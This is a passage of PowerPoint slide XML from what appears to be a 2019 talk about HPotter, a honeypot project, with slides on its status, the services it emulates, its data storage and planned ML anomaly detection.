          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One Day</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Date Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42148B35-A094-6841-868F-624E4A7DB8DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D2B1B0-7C22-DB4A-8FE3-266B41A7094F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A8EC3CC-DC1B-A444-AC0D-031E5EF08556}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31293162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 shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6064E5F-7110-C445-BDA7-08BCF9E5CFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="23111" b="-23111"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="952307" y="1063229"/>
            <a:ext cx="7239385" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ABBCADA-1C25-BD4A-85DA-91DE46056930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One Week</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA973885-FB79-CE42-8DE5-30F34A3F2E99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6307A289-7FA1-EC49-918B-05B199859875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1360FB-E68D-6B49-BEB4-7796E05B21EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1940081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5AC04-12C0-104E-8155-E21E337977D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One Month</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Date Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A040EE-BA39-FF42-BA42-0E5611D81E58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40D82DAF-8127-8C47-ADE2-7EA393075AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3E8E27-C196-0548-AE00-2CA463511ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A close up of a map&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{426CC710-AF2F-114B-9E2C-DBA0A68976FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334070" y="1063229"/>
            <a:ext cx="6475860" cy="3616324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7730297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2814B8-3C11-4B47-8D47-E03FCFBE08EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA54B33A-9A72-3D46-8702-4026ED168AC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/drsjb80/HPotter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~1000 lines of Python 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD01CA70-841B-B04D-9003-A35863EB19C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22D47084-4939-574B-8B85-48F133622E39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2257F2F8-7320-7947-B04D-CF0CE9EE4A90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36538769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DF62DA-8FC0-664B-A7CC-04D6A06A7D20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Status</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B46AB19F-4108-A645-ADD1-4FA1A4C480D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>telnet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, TLS, Apache, MariaDB, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saving to SQL via ORM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GraphQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Date Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{935DC34E-07E2-3446-B2BA-9662ED0753CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{812BDF54-B3FB-4F48-B78F-81316AC7D31A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5F162D5-990E-F147-9230-DFA9269BEC57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1068473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AF8F4-8E39-A34D-8E51-B542D92669AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Works in Progress</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745D2483-3604-694D-8EB2-C711CE28F0BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saving to Mongo and S3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ML anomaly detection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF130FDA-CEFD-2F45-A6AE-F5E341F51EB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EB7B4A5-653D-264C-97D8-95CF4A6D6BDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8E47F26-B2B8-1241-AD21-87712CD717AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34122691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19BBD-DA8B-E146-9469-293AE5EA88C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cupboard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Under the Stairs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8" descr="A circuit board&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30755E9-5084-C245-A731-CDF7D21FF2AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="986491" y="1200150"/>
            <a:ext cx="7171018" cy="3394075"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Date Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{633ABE37-8C61-954E-89B0-89034AC83077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94C66835-24FF-BC44-9D0D-9DDA71B0785F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
